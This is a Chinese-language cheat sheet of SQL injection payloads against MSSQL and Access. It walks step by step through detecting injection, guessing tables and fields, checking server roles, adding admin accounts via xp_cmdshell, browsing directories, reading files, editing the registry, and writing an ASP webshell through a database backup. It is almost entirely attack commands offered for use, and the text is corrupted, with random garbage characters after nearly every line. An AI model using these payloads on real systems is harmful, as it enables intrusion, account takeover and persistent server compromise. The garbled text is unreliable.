1.判断是否有注入;and 1=1 ;and 1=2 (NF~Ck�$#q
2.初步判断是否是mssql ;and user>0 xl��A$:M&
vU���ohtS*
3.注入参数是字符'and [查询条件] and ''=' 3Nq�N�\5B:
_*�1��`�@�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' L��)�@?e?9
M<kj�_�.
5.判断数据库系统 B��56L1^�7
hR�Uh�X��[
;and (select count(*) from sysobjects)>0 mssql {(r`k;f�B�
��6)Y.7�XR
;and (select count(*) from msysobjects)>0 access -O�apVa�c
;#vKi0��V7
�whi�`�Z:~
@~YYD#'vNY
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \$*7� �>`k
NT���e��5�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 5N/%�v&1��
D ,�o}e�l�
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ^/\Of{OZ�-
PH+�S};Uxv
9.(1)猜字段的ascii值(access) Q�o;�zH�Z'
VJic�k�XA�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Rb%�8)t
x�
a�uK�?]�(U
(2)猜字段的ascii值(mssql) �56zL"�TF`
� UA4�8Ug�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 B?��'�#4J
=;2�%a��(�
10.测试权限结构(mssql) {L/��tst#C
Y@N,qH�tz�
SqEg�n�}m$
"1��L�$|�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- G(��p`1~xm
;"�dV"W
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �]G5�w�6&d
q��*_�/t�o
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- � �%oZ6l*
+l9!Fl{MK\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �\s=t|Wpu2
glM$R���&/
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 7UV�z�p v�
S�YCEQ�5
-
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- _B/�dWA�,P
~Y|*`C_)
;and 1=(select IS_MEMBER('db_owner'));-- DU5c=rxW��
[�AYOYENp-
�[lWQ'�DZ�
�!g�5��xq
11.添加mssql和系统的帐户 Y
��}�$�/e
x4;�"�!Kq\
;exec master.dbo.sp_addlogin username;-- ;<Ar=?���
;exec master.dbo.sp_password null,username,password;-- fI{&�#~f4C
y\Ic@-a�WI
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- .�1KhBgy^K
�LBM ^�9�W
;exec master.dbo.xp_cmdshell 'net user username password �5-aj�2>=7
�j|U�#)v/�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 8ZM&(L�z7u
*K|�W
/'_&
;exec master.dbo.xp_cmdshell 'net user username password /add';-- nq��I@Y�)�
eg(6^:z?f
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- eJx�w)�zd7
gW>uR3Ca4
����gQ'zW�
#_6�I �w`0
12.(1)遍历目录 Q=�A�avKn#
wy0tgy(' |
;create table dirs(paths varchar(100), id int) 8$�6�Y{$&C
V@z�g}C|e�
;insert dirs exec master.dbo.xp_dirtree 'c:\' �x3 q]I�8q
^@3sT,�M,S
;and (select top 1 paths from dirs)>0 �OS�s&�r�$
�:Av#j@�#�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ]s'Q_wh_-v
q8/MMK�CbX
��t&H?\)!4
q"\Z-D0�B4
(2)遍历目录 7gj4j^a^]{
,]4�6I.�]�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 4]?<�hH��9
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 a%kQl^�I�4
=]6%G��7T�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 +x0!�*3��q
{�1�U�Q/_
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 F5P[dp-`1
-w9p���w�B
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 JM�rEFk���
SxOC��1+Oy
TW)c#P4�3K
c3�jx�+Q
13.mssql中的存储过程 ���,\_1w��
qh9Z�50E9�
xp_regenumvalues 注册表根键, 子键 8K:y�\���1
sD�Ps
G5q<
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 |TS>h�w�kI
'[A�lh�B�X
xp_regread 根键,子键,键值名 ~;l@|7w�Gz
�ED=V8�';D
;exec xp_regread XGYbnZ�~
�
h2Ld[xvCu%
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 )����J2�mM
oI
}VV6v�O
xp_regwrite 根键,子键, 值名, 值类型, 值 ?�}�wk.gt>
#M9~L[nF�S
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �G<}(��)+L
?zh��9d%R�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 A\4D�7�9>x
$x�z�Av�{
xp_regdeletevalue 根键,子键,值名 �#.rdQ,)�<
ojaws+(& y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �>�_[�9t��
�4!�Fo�$9
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 N�jVYLn<.r
F�Hj"
n��B
]�<�ldWL��
}AB,�8n`��
14.mssql的backup创建webshell �~IYU�uWF(
-� Ajo�9�H
use model ] �eotc2?u
r)y=lAyF>�
create table cmd(str image); bo�2H]�PL*
J\�+0�[~~
insert into cmd(str) values (''); B�^4&-z�2|
u(�@$a��4z
backup database model to disk='c:\l.asp'; '�))�0Lh
l
�zd2)M@���
�I(i}c�~�R
~ksi�</s
15.mssql内置函数 Ka��PAa�:Q
|:nn>E}ZA/
;and (select @@version)>0 获得Windows的版本号 ��cz
>�V8�
Vr���]��id
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ��8<X#f�
!
�B,�?��T�%
;and (select user_name())>0 爆当前系统的连接用户 VJeu�8Z�J.
|,S+@"�0�#
;and (select db_name())>0 得到当前连接的数据库 a!a-b~�#cx
�T�-��.%��
�Bal$���+S
GzhYY"iif#
16.简洁的webshell Z"/p,A9W9|
i6^twK)�j
use model }JF13be��U
3
}du�G/��
create table cmd(str image); \n�XtH}9ZF
=$u!
59_dE
insert into cmd(str) values ('');
SW���H��2
j_K��4;k#r
backup database model to disk='g:\wwwtest\l.asp';
